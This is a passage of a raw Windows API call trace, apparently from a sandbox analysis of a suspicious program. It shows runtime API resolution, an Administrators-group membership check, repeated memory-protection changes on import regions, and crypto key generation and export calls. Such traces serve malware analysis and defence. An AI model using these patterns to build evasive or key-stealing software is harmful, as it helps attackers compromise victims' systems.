TokenInformationLength=0x4, ReturnLength=0x41ecbc | out: TokenInformation=0x727248, ReturnLength=0x41ecbc) returned 1 [0064.418] LocalFree (hMem=0x727248) returned 0x0 [0064.418] GetProcAddress (hModule=0x77710000, lpProcName="DuplicateTokenEx") returned 0x7771ca24 [0064.418] GetProcAddress (hModule=0x77710000, lpProcName="DuplicateTokenExW") returned 0x0 [0064.419] DuplicateTokenEx (in: hExistingToken=0x27c, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x41ecc4 | out: phNewToken=0x41ecc4*=0x280) returned 1 [0064.419] GetProcAddress (hModule=0x77710000, lpProcName="CheckTokenMembership") returned 0x7771df04 [0064.419] GetProcAddress (hModule=0x77710000, lpProcName="CheckTokenMembershipW") returned 0x0 [0064.419] CheckTokenMembership (in: TokenHandle=0x280, SidToCheck=0x3394a14*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x41ecd4 | out: IsMember=0x41ecd4) returned 1 [0064.419] CloseHandle (hObject=0x280) returned 1 [0064.455] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0xb21ad4, cbMultiByte=11, lpWideCharStr=0x41d9d8, cchWideChar=2047 | out: lpWideCharStr="CRYPTSP.dll璠崠+嶄+畨r읐r眸l〧璡?A䊭ļ?Aọ矋媮\x13￾￿矆矆") returned 11 [0064.455] SysReAllocStringLen (in: pbstr=0x41e9dc*=0x0, psz="CRYPTSP.dll", len=0xb | out: pbstr=0x41e9dc*="CRYPTSP.dll") returned 1 [0064.455] CharLowerBuffW (in: lpsz="CRYPTSP.dll", cchLength=0xb | out: lpsz="cryptsp.dll") returned 0xb [0064.455] LoadLibraryExA (lpLibFileName="CRYPTSP.dll", hFile=0x0, dwFlags=0x0) returned 0x75240000 [0064.610] GetLastError () returned 0x0 [0064.611] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e9c8*=0x75241014, NumberOfBytesToProtect=0x41e9cc, NewAccessProtection=0x4, OldAccessProtection=0x41ea00 | out: BaseAddress=0x41e9c8*=0x75241000, NumberOfBytesToProtect=0x41e9cc, OldAccessProtection=0x41ea00*=0x20) returned 0x0 [0064.611] GetCurrentProcess () returned 0xffffffff [0064.611] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e9c8*=0x75241014, NumberOfBytesToProtect=0x41e9cc, NewAccessProtection=0x20, OldAccessProtection=0x41ea00 | out: BaseAddress=0x41e9c8*=0x75241000, NumberOfBytesToProtect=0x41e9cc, OldAccessProtection=0x41ea00*=0x4) returned 0x0 [0064.611] GetCurrentProcess () returned 0xffffffff [0064.612] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e9c8*=0x75241018, NumberOfBytesToProtect=0x41e9cc, NewAccessProtection=0x4, OldAccessProtection=0x41ea00 | out: BaseAddress=0x41e9c8*=0x75241000, NumberOfBytesToProtect=0x41e9cc, OldAccessProtection=0x41ea00*=0x20) returned 0x0 [0064.612] GetCurrentProcess () returned 0xffffffff [0064.612] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e9c8*=0x75241018, NumberOfBytesToProtect=0x41e9cc, NewAccessProtection=0x20, OldAccessProtection=0x41ea00 | out: BaseAddress=0x41e9c8*=0x75241000, NumberOfBytesToProtect=0x41e9cc, OldAccessProtection=0x41ea00*=0x4) returned 0x0 [0064.612] GetCurrentProcess () returned 0xffffffff [0064.612] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e9c8*=0x7524101c, NumberOfBytesToProtect=0x41e9cc, NewAccessProtection=0x4, OldAccessProtection=0x41ea00 | out: BaseAddress=0x41e9c8*=0x75241000, NumberOfBytesToProtect=0x41e9cc, OldAccessProtection=0x41ea00*=0x20) returned 0x0 [0064.613] GetCurrentProcess () returned 0xffffffff [0064.613] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e9c8*=0x7524101c, NumberOfBytesToProtect=0x41e9cc, NewAccessProtection=0x20, OldAccessProtection=0x41ea00 | out: BaseAddress=0x41e9c8*=0x75241000, NumberOfBytesToProtect=0x41e9cc, OldAccessProtection=0x41ea00*=0x4) returned 0x0 [0064.613] GetCurrentProcess () returned 0xffffffff [0064.613] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e9c8*=0x75241020, NumberOfBytesToProtect=0x41e9cc, NewAccessProtection=0x4, OldAccessProtection=0x41ea00 | out: BaseAddress=0x41e9c8*=0x75241000, NumberOfBytesToProtect=0x41e9cc, OldAccessProtection=0x41ea00*=0x20) returned 0x0 [0064.614] GetCurrentProcess () returned 0xffffffff [0064.614] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e9c8*=0x75241020, NumberOfBytesToProtect=0x41e9cc, NewAccessProtection=0x20, OldAccessProtection=0x41ea00 | out: BaseAddress=0x41e9c8*=0x75241000, NumberOfBytesToProtect=0x41e9cc, OldAccessProtection=0x41ea00*=0x4) returned 0x0 [0064.614] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e9c8*=0x7524102c, NumberOfBytesToProtect=0x41e9cc, NewAccessProtection=0x4, OldAccessProtection=0x41ea00 | out: BaseAddress=0x41e9c8*=0x75241000, NumberOfBytesToProtect=0x41e9cc, OldAccessProtection=0x41ea00*=0x20) returned 0x0 [0064.614] GetCurrentProcess () returned 0xffffffff [0064.614] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e9c8*=0x7524102c, NumberOfBytesToProtect=0x41e9cc, NewAccessProtection=0x20, OldAccessProtection=0x41ea00 | out: BaseAddress=0x41e9c8*=0x75241000, NumberOfBytesToProtect=0x41e9cc, OldAccessProtection=0x41ea00*=0x4) returned 0x0 [0064.615] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e9c8*=0x752410d0, NumberOfBytesToProtect=0x41e9cc, NewAccessProtection=0x4, OldAccessProtection=0x41ea00 | out: BaseAddress=0x41e9c8*=0x75241000, NumberOfBytesToProtect=0x41e9cc, OldAccessProtection=0x41ea00*=0x20) returned 0x0 [0064.615] GetCurrentProcess () returned 0xffffffff [0064.615] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e9c8*=0x752410d0, NumberOfBytesToProtect=0x41e9cc, NewAccessProtection=0x20, OldAccessProtection=0x41ea00 | out: BaseAddress=0x41e9c8*=0x75241000, NumberOfBytesToProtect=0x41e9cc, OldAccessProtection=0x41ea00*=0x4) returned 0x0 [0064.615] GetCurrentProcess () returned 0xffffffff [0064.615] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e9c8*=0x752410d4, NumberOfBytesToProtect=0x41e9cc, NewAccessProtection=0x4, OldAccessProtection=0x41ea00 | out: BaseAddress=0x41e9c8*=0x75241000, NumberOfBytesToProtect=0x41e9cc, OldAccessProtection=0x41ea00*=0x20) returned 0x0 [0064.615] GetCurrentProcess () returned 0xffffffff [0064.615] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e9c8*=0x752410d4, NumberOfBytesToProtect=0x41e9cc, NewAccessProtection=0x20, OldAccessProtection=0x41ea00 | out: BaseAddress=0x41e9c8*=0x75241000, NumberOfBytesToProtect=0x41e9cc, OldAccessProtection=0x41ea00*=0x4) returned 0x0 [0064.616] GetProcAddress (hModule=0x75240000, lpProcName="CryptGetDefaultProviderW") returned 0x7524693a [0064.618] GetProcAddress (hModule=0x75240000, lpProcName="CryptAcquireContextW") returned 0x752463e8 [0064.622] CreateFileW (lpFileName="C:\\Windows\\system32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x284 [0064.622] GetLastError () returned 0x0 [0064.622] SysReAllocStringLen (in: pbstr=0x41e5a0*=0x0, psz="C:\\Windows\\system32\\rsaenh.dll", len=0x1e | out: pbstr=0x41e5a0*="C:\\Windows\\system32\\rsaenh.dll") returned 1 [0064.622] GetThreadLocale () returned 0x409 [0064.622] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\system32\\rsaenh.dll", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0064.622] GetThreadLocale () returned 0x409 [0064.622] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\system32\\rsaenh.dll", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0064.622] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\rsaenh.dll", nBufferLength=0x104, lpBuffer=0x41e324, lpFilePart=0x41e320 | out: lpBuffer="C:\\Windows\\system32\\rsaenh.dll", lpFilePart=0x41e320*="rsaenh.dll") returned 0x1e [0064.622] SysReAllocStringLen (in: pbstr=0x41e5a0*="C:\\Windows\\system32\\rsaenh.dll", psz="C:\\Windows\\system32\\rsaenh.dll", len=0x1e | out: pbstr=0x41e5a0*="C:\\Windows\\system32\\rsaenh.dll") returned 1 [0064.622] SysReAllocStringLen (in: pbstr=0x41e550*=0x0, psz="C:\\Windows\\system32\\rsaenh.dll", len=0x1e | out: pbstr=0x41e550*="C:\\Windows\\system32\\rsaenh.dll") returned 1 [0064.623] CharLowerBuffW (in: lpsz="C:\\Windows\\system32\\rsaenh.dll", cchLength=0x1e | out: lpsz="c:\\windows\\system32\\rsaenh.dll") returned 0x1e [0064.623] SysReAllocStringLen (in: pbstr=0x41e5a0*="C:\\Windows\\system32\\rsaenh.dll", psz="c:\\windows\\system32\\rsaenh.dll", len=0x1e | out: pbstr=0x41e5a0*="c:\\windows\\system32\\rsaenh.dll") returned 1 [0064.623] SetLastError (dwErrCode=0x0) [0064.623] GetCurrentThreadId () returned 0xba4 [0064.623] GetCurrentThreadId () returned 0xba4 [0064.623] GetCurrentThreadId () returned 0xba4 [0064.623] GetCurrentThreadId () returned 0xba4 [0064.623] GetCurrentThreadId () returned 0xba4 [0064.623] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0064.623] GetCurrentThreadId () returned 0xba4 [0064.623] GetCurrentThreadId () returned 0xba4 [0064.623] GetCurrentThreadId () returned 0xba4 [0064.623] SetEvent (hEvent=0xbc) returned 1 [0064.623] GetFileSize (in: hFile=0x284, lpFileSizeHigh=0x41e5f4 | out: lpFileSizeHigh=0x41e5f4*=0x0) returned 0x3b4f8 [0064.623] GetCurrentThreadId () returned 0xba4 [0064.623] ResetEvent (hEvent=0xb8) returned 1 [0064.623] GetCurrentThreadId () returned 0xba4 [0064.623] GetCurrentThreadId () returned 0xba4 [0064.623] GetCurrentThreadId () returned 0xba4 [0064.624] GetCurrentThreadId () returned 0xba4 [0064.624] ResetEvent (hEvent=0xb8) returned 1 [0064.624] GetCurrentThreadId () returned 0xba4 [0064.624] GetCurrentThreadId () returned 0xba4 [0064.624] SetEvent (hEvent=0xbc) returned 1 [0064.624] SetEvent (hEvent=0xb8) returned 1 [0064.624] CloseHandle (hObject=0x288) returned 1 [0064.632] GetCurrentThreadId () returned 0xba4 [0064.632] ResetEvent (hEvent=0xb8) returned 1 [0064.632] GetCurrentThreadId () returned 0xba4 [0064.632] GetCurrentThreadId () returned 0xba4 [0064.632] GetCurrentThreadId () returned 0xba4 [0064.632] GetCurrentThreadId () returned 0xba4 [0064.633] ResetEvent (hEvent=0xb8) returned 1 [0064.633] GetCurrentThreadId () returned 0xba4 [0064.633] GetCurrentThreadId () returned 0xba4 [0064.633] SetEvent (hEvent=0xbc) returned 1 [0064.633] SetEvent (hEvent=0xb8) returned 1 [0064.633] CloseHandle (hObject=0x284) returned 1 [0064.639] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0xb21ad4, cbMultiByte=12, lpWideCharStr=0x41d3f4, cchWideChar=2047 | out: lpWideCharStr="ADVAPI32.dll倘sd") returned 12 [0064.640] SysReAllocStringLen (in: pbstr=0x41e3f8*=0x0, psz="ADVAPI32.dll", len=0xc | out: pbstr=0x41e3f8*="ADVAPI32.dll") returned 1 [0064.640] CharLowerBuffW (in: lpsz="ADVAPI32.dll", cchLength=0xc | out: lpsz="advapi32.dll") returned 0xc [0064.640] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x77710000 [0064.640] GetLastError () returned 0x0 [0064.640] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e3e4*=0x77711520, NumberOfBytesToProtect=0x41e3e8, NewAccessProtection=0x4, OldAccessProtection=0x41e41c | out: BaseAddress=0x41e3e4*=0x77711000, NumberOfBytesToProtect=0x41e3e8, OldAccessProtection=0x41e41c*=0x20) returned 0x0 [0064.641] GetCurrentProcess () returned 0xffffffff [0064.641] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e3e4*=0x77711520, NumberOfBytesToProtect=0x41e3e8, NewAccessProtection=0x20, OldAccessProtection=0x41e41c | out: BaseAddress=0x41e3e4*=0x77711000, NumberOfBytesToProtect=0x41e3e8, OldAccessProtection=0x41e41c*=0x4) returned 0x0 [0064.641] GetCurrentProcess () returned 0xffffffff [0064.641] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e3e4*=0x77711540, NumberOfBytesToProtect=0x41e3e8, NewAccessProtection=0x4, OldAccessProtection=0x41e41c | out: BaseAddress=0x41e3e4*=0x77711000, NumberOfBytesToProtect=0x41e3e8, OldAccessProtection=0x41e41c*=0x20) returned 0x0 [0064.641] GetCurrentProcess () returned 0xffffffff [0064.641] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e3e4*=0x77711540, NumberOfBytesToProtect=0x41e3e8, NewAccessProtection=0x20, OldAccessProtection=0x41e41c | out: BaseAddress=0x41e3e4*=0x77711000, NumberOfBytesToProtect=0x41e3e8, OldAccessProtection=0x41e41c*=0x4) returned 0x0 [0064.642] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e3e4*=0x7771175c, NumberOfBytesToProtect=0x41e3e8, NewAccessProtection=0x4, OldAccessProtection=0x41e41c | out: BaseAddress=0x41e3e4*=0x77711000, NumberOfBytesToProtect=0x41e3e8, OldAccessProtection=0x41e41c*=0x20) returned 0x0 [0064.642] GetCurrentProcess () returned 0xffffffff [0064.642] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e3e4*=0x7771175c, NumberOfBytesToProtect=0x41e3e8, NewAccessProtection=0x20, OldAccessProtection=0x41e41c | out: BaseAddress=0x41e3e4*=0x77711000, NumberOfBytesToProtect=0x41e3e8, OldAccessProtection=0x41e41c*=0x4) returned 0x0 [0064.642] GetCurrentProcess () returned 0xffffffff [0064.642] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e3e4*=0x77711768, NumberOfBytesToProtect=0x41e3e8, NewAccessProtection=0x4, OldAccessProtection=0x41e41c | out: BaseAddress=0x41e3e4*=0x77711000, NumberOfBytesToProtect=0x41e3e8, OldAccessProtection=0x41e41c*=0x20) returned 0x0 [0064.643] GetCurrentProcess () returned 0xffffffff [0064.643] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e3e4*=0x77711768, NumberOfBytesToProtect=0x41e3e8, NewAccessProtection=0x20, OldAccessProtection=0x41e41c | out: BaseAddress=0x41e3e4*=0x77711000, NumberOfBytesToProtect=0x41e3e8, OldAccessProtection=0x41e41c*=0x4) returned 0x0 [0064.643] GetCurrentProcess () returned 0xffffffff [0064.643] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e3e4*=0x777117b8, NumberOfBytesToProtect=0x41e3e8, NewAccessProtection=0x4, OldAccessProtection=0x41e41c | out: BaseAddress=0x41e3e4*=0x77711000, NumberOfBytesToProtect=0x41e3e8, OldAccessProtection=0x41e41c*=0x20) returned 0x0 [0064.643] GetCurrentProcess () returned 0xffffffff [0064.643] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e3e4*=0x777117b8, NumberOfBytesToProtect=0x41e3e8, NewAccessProtection=0x20, OldAccessProtection=0x41e41c | out: BaseAddress=0x41e3e4*=0x77711000, NumberOfBytesToProtect=0x41e3e8, OldAccessProtection=0x41e41c*=0x4) returned 0x0 [0064.643] GetCurrentProcess () returned 0xffffffff [0064.644] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e3e4*=0x777117bc, NumberOfBytesToProtect=0x41e3e8, NewAccessProtection=0x4, OldAccessProtection=0x41e41c | out: BaseAddress=0x41e3e4*=0x77711000, NumberOfBytesToProtect=0x41e3e8, OldAccessProtection=0x41e41c*=0x20) returned 0x0 [0064.644] GetCurrentProcess () returned 0xffffffff [0064.644] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e3e4*=0x777117bc, NumberOfBytesToProtect=0x41e3e8, NewAccessProtection=0x20, OldAccessProtection=0x41e41c | out: BaseAddress=0x41e3e4*=0x77711000, NumberOfBytesToProtect=0x41e3e8, OldAccessProtection=0x41e41c*=0x4) returned 0x0 [0064.644] GetCurrentProcess () returned 0xffffffff [0064.644] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e3e4*=0x777117c8, NumberOfBytesToProtect=0x41e3e8, NewAccessProtection=0x4, OldAccessProtection=0x41e41c | out: BaseAddress=0x41e3e4*=0x77711000, NumberOfBytesToProtect=0x41e3e8, OldAccessProtection=0x41e41c*=0x20) returned 0x0 [0064.644] GetCurrentProcess () returned 0xffffffff [0064.644] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e3e4*=0x777117c8, NumberOfBytesToProtect=0x41e3e8, NewAccessProtection=0x20, OldAccessProtection=0x41e41c | out: BaseAddress=0x41e3e4*=0x77711000, NumberOfBytesToProtect=0x41e3e8, OldAccessProtection=0x41e41c*=0x4) returned 0x0 [0064.645] GetCurrentProcess () returned 0xffffffff [0064.645] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e3e4*=0x777117d0, NumberOfBytesToProtect=0x41e3e8, NewAccessProtection=0x4, OldAccessProtection=0x41e41c | out: BaseAddress=0x41e3e4*=0x77711000, NumberOfBytesToProtect=0x41e3e8, OldAccessProtection=0x41e41c*=0x20) returned 0x0 [0064.645] GetCurrentProcess () returned 0xffffffff [0064.645] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e3e4*=0x777117d0, NumberOfBytesToProtect=0x41e3e8, NewAccessProtection=0x20, OldAccessProtection=0x41e41c | out: BaseAddress=0x41e3e4*=0x77711000, NumberOfBytesToProtect=0x41e3e8, OldAccessProtection=0x41e41c*=0x4) returned 0x0 [0064.645] GetCurrentProcess () returned 0xffffffff [0064.645] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e3e4*=0x7771180c, NumberOfBytesToProtect=0x41e3e8, NewAccessProtection=0x4, OldAccessProtection=0x41e41c | out: BaseAddress=0x41e3e4*=0x77711000, NumberOfBytesToProtect=0x41e3e8, OldAccessProtection=0x41e41c*=0x20) returned 0x0 [0064.646] GetCurrentProcess () returned 0xffffffff [0064.646] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e3e4*=0x7771180c, NumberOfBytesToProtect=0x41e3e8, NewAccessProtection=0x20, OldAccessProtection=0x41e41c | out: BaseAddress=0x41e3e4*=0x77711000, NumberOfBytesToProtect=0x41e3e8, OldAccessProtection=0x41e41c*=0x4) returned 0x0 [0064.646] GetCurrentProcess () returned 0xffffffff [0064.646] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e3e4*=0x7771182c, NumberOfBytesToProtect=0x41e3e8, NewAccessProtection=0x4, OldAccessProtection=0x41e41c | out: BaseAddress=0x41e3e4*=0x77711000, NumberOfBytesToProtect=0x41e3e8, OldAccessProtection=0x41e41c*=0x20) returned 0x0 [0064.646] GetCurrentProcess () returned 0xffffffff [0064.646] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e3e4*=0x7771182c, NumberOfBytesToProtect=0x41e3e8, NewAccessProtection=0x20, OldAccessProtection=0x41e41c | out: BaseAddress=0x41e3e4*=0x77711000, NumberOfBytesToProtect=0x41e3e8, OldAccessProtection=0x41e41c*=0x4) returned 0x0 [0064.646] GetCurrentProcess () returned 0xffffffff [0064.646] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e3e4*=0x77711860, NumberOfBytesToProtect=0x41e3e8, NewAccessProtection=0x4, OldAccessProtection=0x41e41c | out: BaseAddress=0x41e3e4*=0x77711000, NumberOfBytesToProtect=0x41e3e8, OldAccessProtection=0x41e41c*=0x20) returned 0x0 [0064.647] GetCurrentProcess () returned 0xffffffff [0064.647] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e3e4*=0x77711860, NumberOfBytesToProtect=0x41e3e8, NewAccessProtection=0x20, OldAccessProtection=0x41e41c | out: BaseAddress=0x41e3e4*=0x77711000, NumberOfBytesToProtect=0x41e3e8, OldAccessProtection=0x41e41c*=0x4) returned 0x0 [0064.647] GetProcAddress (hModule=0x77710000, lpProcName="OpenThreadToken") returned 0x7772432c [0064.647] GetProcAddress (hModule=0x77710000, lpProcName="OpenProcessToken") returned 0x77724304 [0064.648] GetProcAddress (hModule=0x77710000, lpProcName="GetTokenInformation") returned 0x7772431c [0064.648] GetProcAddress (hModule=0x77710000, lpProcName="AllocateAndInitializeSid") returned 0x777240e6 [0064.648] GetProcAddress (hModule=0x77710000, lpProcName="EqualSid") returned 0x7772410b [0064.649] GetProcAddress (hModule=0x77710000, lpProcName="FreeSid") returned 0x7772412e [0064.649] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0xb21ad4, cbMultiByte=13, lpWideCharStr=0x41d6e8, cchWideChar=2047 | out: lpWideCharStr="CRYPTBASE.dll") returned 13 [0064.649] SysReAllocStringLen (in: pbstr=0x41e6ec*=0x0, psz="CRYPTBASE.dll", len=0xd | out: pbstr=0x41e6ec*="CRYPTBASE.dll") returned 1 [0064.649] CharLowerBuffW (in: lpsz="CRYPTBASE.dll", cchLength=0xd | out: lpsz="cryptbase.dll") returned 0xd [0064.649] LoadLibraryExA (lpLibFileName="CRYPTBASE.dll", hFile=0x0, dwFlags=0x0) returned 0x75790000 [0064.649] GetLastError () returned 0x0 [0064.650] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e6d8*=0x7579109c, NumberOfBytesToProtect=0x41e6dc, NewAccessProtection=0x4, OldAccessProtection=0x41e710 | out: BaseAddress=0x41e6d8*=0x75791000, NumberOfBytesToProtect=0x41e6dc, OldAccessProtection=0x41e710*=0x20) returned 0x0 [0064.650] GetCurrentProcess () returned 0xffffffff [0064.650] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e6d8*=0x7579109c, NumberOfBytesToProtect=0x41e6dc, NewAccessProtection=0x20, OldAccessProtection=0x41e710 | out: BaseAddress=0x41e6d8*=0x75791000, NumberOfBytesToProtect=0x41e6dc, OldAccessProtection=0x41e710*=0x4) returned 0x0 [0064.650] GetCurrentProcess () returned 0xffffffff [0064.650] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e6d8*=0x757910a4, NumberOfBytesToProtect=0x41e6dc, NewAccessProtection=0x4, OldAccessProtection=0x41e710 | out: BaseAddress=0x41e6d8*=0x75791000, NumberOfBytesToProtect=0x41e6dc, OldAccessProtection=0x41e710*=0x20) returned 0x0 [0064.651] GetCurrentProcess () returned 0xffffffff [0064.651] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e6d8*=0x757910a4, NumberOfBytesToProtect=0x41e6dc, NewAccessProtection=0x20, OldAccessProtection=0x41e710 | out: BaseAddress=0x41e6d8*=0x75791000, NumberOfBytesToProtect=0x41e6dc, OldAccessProtection=0x41e710*=0x4) returned 0x0 [0064.651] GetProcAddress (hModule=0x75790000, lpProcName="SystemFunction036") returned 0x757912f0 [0064.661] GetProcAddress (hModule=0x75240000, lpProcName="CryptGetUserKey") returned 0x75245003 [0064.663] GetProcAddress (hModule=0x75240000, lpProcName="CryptGenKey") returned 0x7524497b [0079.635] GetProcAddress (hModule=0x75790000, lpProcName="SystemFunction040") returned 0x7579444f [0079.637] GetProcAddress (hModule=0x75790000, lpProcName="SystemFunction041") returned 0x757943ee [0079.719] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0xb21ad4, cbMultiByte=11, lpWideCharStr=0x41d9cc, cchWideChar=2047 | out: lpWideCharStr="crypt32.dll") returned 11 [0079.719] SysReAllocStringLen (in: pbstr=0x41e9d0*=0x0, psz="crypt32.dll", len=0xb | out: pbstr=0x41e9d0*="crypt32.dll") returned 1 [0079.719] CharLowerBuffW (in: lpsz="crypt32.dll", cchLength=0xb | out: lpsz="crypt32.dll") returned 0xb [0079.719] LoadLibraryExA (lpLibFileName="crypt32.dll", hFile=0x0, dwFlags=0x20) returned 0x77550002 [0080.564] GetLastError () returned 0x0 [0080.574] FreeLibrary (hLibModule=0x77550002) returned 1 [0080.579] GetProcAddress (hModule=0x75240000, lpProcName="CryptGetKeyParam") returned 0x75244ebe [0080.696] GetProcAddress (hModule=0x75240000, lpProcName="CryptExportKey") returned 0x752450dd [0081.950] GetProcAddress (hModule=0x75240000, lpProcName="CryptDestroyKey") returned 0x75244cf3 [0081.951] GetProcAddress (hModule=0x75240000, lpProcName="CryptReleaseContext") returned 0x75242ef0 [0082.065] GetProcAddress (hModule=0x75240000, lpProcName="CryptGenRandom") returned 0x75244f73 [0082.168] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0082.175] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x41e364, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10204, lpName="Global\\NLS_CodePage_1252_3_2_0_0") returned 0x288 [0082.175] GetCurrentThreadId () returned 0xba4 [0082.175] ResetEvent (hEvent=0xb8) returned 1 [0082.175] GetCurrentThreadId () returned 0xba4 [0082.175] GetCurrentThreadId () returned 0xba4 [0082.175] GetCurrentThreadId () returned 0xba4 [0082.175] GetCurrentThreadId () returned 0xba4 [0082.175] ResetEvent (hEvent=0xb8) returned 1 [0082.175] GetCurrentThreadId () returned 0xba4 [0082.175] GetCurrentThreadId () returned 0xba4 [0082.175] SetEvent (hEvent=0xbc) returned 1 [0082.175] SetEvent (hEvent=0xb8) returned 1 [0082.176] GetCurrentThreadId () returned 0xba4 [0082.176] GetCurrentThreadId () returned 0xba4 [0082.176] GetCurrentThreadId () returned 0xba4 [0082.176] GetCurrentThreadId () returned 0xba4 [0082.176] GetCurrentThreadId () returned 0xba4 [0082.176] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0082.176] GetCurrentThreadId () returned 0xba4 [0082.176] GetCurrentThreadId () returned 0xba4 [0082.176] GetCurrentThreadId () returned 0xba4 [0082.176] SetEvent (hEvent=0xbc) returned 1 [0082.176] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x6a0000 [0082.204] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x41e86c | out: TokenHandle=0x41e86c*=0x284) returned 1 [0082.208] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x41e87c | out: TokenHandle=0x41e87c*=0x28c) returned 1 [0082.214] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceFrequency") returned 0x76d441f0 [0082.214] QueryPerformanceFrequency (in: lpFrequency=0x2b59c0 | out: lpFrequency=0x2b59c0*=100000000) returned 1 [0082.218] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0082.218] QueryPerformanceCounter (in: lpPerformanceCount=0x41ec80 | out: lpPerformanceCount=0x41ec80*=20227166691) returned 1 [0082.222] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x41e838 | out: TokenHandle=0x41e838*=0x290) returned 1 [0082.225] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x41e848 | out: TokenHandle=0x41e848*=0x294) returned 1 [0082.245] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x41e84c | out: TokenHandle=0x41e84c*=0x298) returned 1 [0082.247] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x41e85c | out: TokenHandle=0x41e85c*=0x29c) returned 1 [0082.258] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x41eb68 | out: TokenHandle=0x41eb68*=0x2a0) returned 1 [0082.261] SysReAllocStringLen (in: pbstr=0x41df14*=0x0, psz="rasapi32.dll", len=0xc | out: 